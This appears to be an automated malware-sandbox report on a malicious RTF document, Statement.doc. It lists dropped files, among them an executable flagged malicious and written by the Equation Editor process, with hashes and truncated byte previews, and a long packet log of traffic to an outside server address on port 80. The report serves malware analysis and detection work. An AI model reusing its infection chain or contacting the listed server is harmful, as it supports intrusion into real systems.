            C:\Users\user\AppData\Roaming\JNM.exe
            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1973760
            Entropy (8bit):2.849298578285801
            Encrypted:false
            SSDEEP:1536:FNn93XOcZPdE8u+6zQc/jLsAngk98QjHBxo:z93ecZC8u+68c/7986
            MD5:10D30AD1922421E73E133AD020DF424F
            SHA1:7AB820DC29537EBAADB2D04C2F8B6F246CB8F24A
            SHA-256:79D73D305E1A52C157868E9F0305AE5E6AEBB28E43D360334C118FC1640A5B2C
            SHA-512:72E98B506476EE511D54D0F676FE559C603DD688D5C56B43A124D2D1A712561CD97236CACFE9DC064E416537CA717C2D207F0B4A123CCFA1E966372D8F642A8A
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 35%
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9.`............................^8... ...@....@.. .......................`............@..................................8..K............................@....................................................... ............... ..H............text...d.... ...................... ..`.reloc.......@......................@..B........................................................@8......H........R..`............................................................*. ....*.....90...(....9........r`..p....(C...(D...*........(E...*....**....(_...*..0.._.......(....(....(....(....(....(....(....(....(....(....(...............(....(....(...............(....(....(...............(....(....(....(....(~...(}...(|...({...(z...(y...(x...(w...(v...(u...(t...(s...(r...(q...(p...(o...(n..............(m...(l...(k..............(j...(i...(h..............(g...(f...(e..............
            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Statement.LNK
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Thu Jan 28 02:12:38 2021, length=111234, window=hide
            Category:dropped
            Size (bytes):2018
            Entropy (8bit):4.566530606487488
            Encrypted:false
            SSDEEP:48:8x/XT0jFg2KrRf4fQh2x/XT0jFg2KrRf4fQ/:8x/XojFdKlgfQh2x/XojFdKlgfQ/
            MD5:9740F08F03EE9772C514D416300985C8
            SHA1:653862A7796EF8FFFAB1254457FB760B794A131A
            SHA-256:D6A4332A51D8E1FEC91F2C5EEBE478FDC48ACDDB4E0B12E93112AFD691A2949B
            SHA-512:237EBAD846AC6262709CDFBB6D0B3DE59E2B7495A97D2A93EB2076F2C6C817C34A26650E46A4505BFABF785556879F08F780D1FCB7216A784A9DD0AF7A55EF3E
            Malicious:false
            Preview: L..................F.... ...y.j..{..y.j..{.....n#................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....d.2.....<R.. .STATEM~1.DOC..H.......Q.y.Q.y*...8.....................S.t.a.t.e.m.e.n.t...d.o.c.......w...............-...8...[............?J......C:\Users\..#...................\\305090\Users.user\Desktop\Statement.doc.$.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.t.a.t.e.m.e.n.t...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......305090..........D_....3N...W...9F.C...........[D_....3N...W...9F.C.......
            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):65
            Entropy (8bit):4.102256182446669
            Encrypted:false
            SSDEEP:3:M12EmpRYuTpRYmX12EmpRYv:MANpRZpReNpRC
            MD5:A225ECA3DB57FCE1A5758E3D1A8724AD
            SHA1:D6EE62F233AC11C74ECEF20EF8C3205C1CFB08C3
            SHA-256:5BDBB39ABB1F4FA53F48A82EA99E73329B590A8D5A4647D1A6CF93FF22E84541
            SHA-512:F4379DDE6A7A408FC07B534C97A0BA3786FBFB9C81E18BC8512FDC060A79EB6E28A239C68C83100497BFC620E3A3B9DA092BADB96C220C771BD496EF55FAF00E
            Malicious:false
            Preview: [doc]..Statement.LNK=0..Statement.LNK=0..[doc]..Statement.LNK=0..
            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):162
            Entropy (8bit):2.431160061181642
            Encrypted:false
            SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
            MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
            SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
            SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
            SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
            Malicious:false
            Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
            C:\Users\user\Desktop\~$atement.doc
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):162
            Entropy (8bit):2.431160061181642
            Encrypted:false
            SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
            MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
            SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
            SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
            SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
            Malicious:false
            Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

            Static File Info

            General

            File type:Rich Text Format data, unknown version
            Entropy (8bit):4.012906709970664
            TrID:
            • Rich Text Format (5005/1) 55.56%
            • Rich Text Format (4004/1) 44.44%
            File name:Statement.doc
            File size:111234
            MD5:854716b6ff05f02534960443c94340a1
            SHA1:6955e99f687a65747a95745b721c43543f3cf389
            SHA256:1421f7c867ff97c915fab1236fe5277b3116b426c0102f805fab25ef19fc681c
            SHA512:c05f6e67531bbefc6dd30bc13b3bee940ea63d1050d6ab26b8b2e8059e10f1714f1a2c2d4700d85ca863cfcd2b0b9665fc08121c9aada7ebb390bdf70bd5e89e
            SSDEEP:3072:/PQuOh2WX/aNt8lHvasJjjg6jYHh8Oj+JiII/:/PQ1dSNaUsJjpjYHwJq/
            File Content Preview:{\rtf2760{\object19672773\objhtml\objw7805\objh3271{\*\objdata753025{\*\qmspace645ansi645\*\pwd645 \*\qmspace645ansi645\*\.645} \...c6d4656e020000000b00000065{\*\objupdate}71554154494f4e2e3300000

            File Icon

            Icon Hash:e4eea2aaa4b4b4a4

            Static RTF Info

            Objects

            IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
            000000040hno

            Network Behavior

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Jan 27, 2021 19:12:26.374280930 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.450932980 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.451047897 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.451312065 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.534096956 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.534126043 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.534138918 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.534154892 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.534333944 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.611943007 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.611969948 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.611987114 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.612005949 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.612018108 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.612051010 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.612117052 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.612133980 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.612291098 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.612301111 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.689646959 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689673901 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689686060 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689732075 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689796925 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689814091 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689831018 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689848900 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689866066 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689882040 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689953089 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.689966917 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689982891 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.689996004 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.690001011 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.690021038 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.690095901 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.691543102 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.768106937 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768136024 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768147945 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768160105 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768177986 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768193960 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768209934 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768224955 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768282890 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768300056 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768311977 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768323898 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768347025 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.768369913 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768414974 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768435955 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.768440008 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.768455982 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768474102 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768491030 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768503904 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768518925 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768521070 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.768529892 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.768549919 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.768579960 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768613100 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768754959 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.768789053 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768807888 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768825054 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768836975 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768852949 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.768867970 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.768889904 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.769238949 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.845402002 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845433950 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845453978 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845472097 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845488071 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845501900 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.845519066 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.845531940 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845586061 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.845696926 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845719099 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845736027 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845752001 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845768929 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845782995 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.845793962 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845809937 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845817089 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.845832109 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845851898 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845860958 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.845880032 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845901966 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845906973 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.845925093 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845940113 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845947981 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.845963001 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845978975 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.845993996 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846009970 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.846020937 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846036911 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846046925 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.846065998 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846084118 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846088886 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.846103907 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846120119 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846127033 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.846178055 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.846271038 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846287966 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846303940 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846316099 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846333027 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846349001 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846364975 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846381903 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.846407890 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.846524954 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846548080 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846565962 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846581936 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846605062 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846611023 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.846626043 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.846638918 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846666098 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846693039 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846698999 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.846714973 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846729994 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846744061 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.846752882 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846779108 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.846795082 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846834898 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.846844912 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.848225117 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.922324896 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.922353983 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.922365904 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.922379017 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.922395945 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.922411919 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.922447920 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.922466040 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.922485113 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.922544956 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.922560930 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.922601938 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.922612906 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.922676086 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.922722101 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.922740936 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.922811031 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.925873995 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.925894022 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.925911903 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.925928116 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.925967932 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.925993919 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.926026106 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.926053047 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926069021 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926088095 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926112890 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.926130056 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926145077 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926162004 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926177979 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926187038 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.926202059 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926218033 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926225901 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.926240921 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926251888 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.926265001 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926280975 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926296949 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926310062 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.926342964 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.926372051 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926387072 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926403999 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926420927 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926444054 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926450014 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.926469088 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926493883 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.926561117 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926578045 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926593065 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926611900 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926618099 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.926639080 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.926687002 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926728010 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926736116 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.926755905 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926774025 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926805019 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.926847935 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926865101 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926892996 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.926902056 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.926943064 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.927474022 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.999034882 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.999062061 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.999074936 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.999087095 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.999104023 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.999120951 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.999136925 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.999151945 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.999164104 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.999186039 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.999196053 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.999211073 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.999231100 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.999238968 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.999258995 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.999279976 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:26.999286890 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:26.999314070 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.003319025 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.003343105 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.003355026 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.003366947 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.003392935 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.003433943 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.003443956 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.003490925 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.004297972 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.004364967 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.004374027 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.004406929 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.004425049 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.004448891 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.004478931 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.004496098 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.004511118 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.004518986 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.004534006 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.004547119 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.004599094 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.004714012 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.004734993 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.004754066 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.004760981 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.004790068 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.004795074 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.004811049 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.004827976 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.004846096 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.004851103 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.004877090 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.004956961 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.004972935 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.005006075 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.005187035 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.005214930 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.005225897 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.005239964 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.005255938 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.005268097 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.005283117 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.005302906 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.005314112 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.005330086 CET804916584.38.135.158192.168.2.22
            Jan 27, 2021 19:12:27.005343914 CET4916580192.168.2.2284.38.135.158
            Jan 27, 2021 19:12:27.005353928 CET804916584.38.135.158192.168.2.22
